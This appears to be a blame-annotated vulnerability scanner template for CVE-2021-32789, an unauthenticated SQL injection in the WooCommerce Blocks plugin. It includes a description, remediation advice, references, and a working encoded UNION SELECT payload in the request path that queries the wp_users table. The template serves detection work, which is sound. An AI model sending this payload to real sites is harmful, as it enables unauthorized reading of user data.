2022-08-06 16:54:58 +00:00
id : CVE-2021-32789
2021-07-15 17:02:19 +00:00
info :
2022-08-10 10:55:06 +00:00
name : WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
author : rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
2022-08-25 08:56:24 +00:00
severity : high
2022-08-10 10:55:06 +00:00
description : |
woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
2023-09-06 12:09:01 +00:00
remediation : |
Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
2022-03-22 03:48:47 +00:00
- https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
2022-08-10 10:55:06 +00:00
- https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a
- https://nvd.nist.gov/vuln/detail/CVE-2021-32789
2022-03-22 03:48:47 +00:00
classification :
2022-08-25 08:56:24 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-06 16:54:58 +00:00
cve-id : CVE-2021-32789
2022-08-25 08:56:24 +00:00
cwe-id : CWE-89
2023-11-16 10:31:49 +00:00
epss-score : 0.01891
2023-11-20 10:14:14 +00:00
epss-percentile : 0.87153
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : automattic
product : woocommerce_blocks
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan
2021-07-15 17:02:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-15 19:04:38 +00:00
- method : GET
path :
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
2021-07-15 17:02:19 +00:00
2021-07-15 17:28:43 +00:00
matchers-condition : and
2021-07-15 17:02:19 +00:00
matchers :
2021-07-15 17:28:43 +00:00
- type : word
words :
2021-07-15 19:04:38 +00:00
- 'sqli-test'
- 'attribute_counts'
2021-08-25 21:13:53 +00:00
- 'price_range'
- 'term'
2021-07-15 17:28:43 +00:00
condition : and
- type : word
2022-08-10 10:55:06 +00:00
part : header
2021-07-15 17:28:43 +00:00
words :
- 'application/json'
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2023-11-21 07:14:20 +00:00
# digest: 4b0a00483046022100b69c7d0e064c28e56f2e3734aec6dd1796b55c4e8e0051d5cb1221053def2208022100d0bbbf1177ead97f45bdc5e641bf1914c138efeac62460bed6e86eded92ddb71:922c64590222798bb761d5b6d8e72950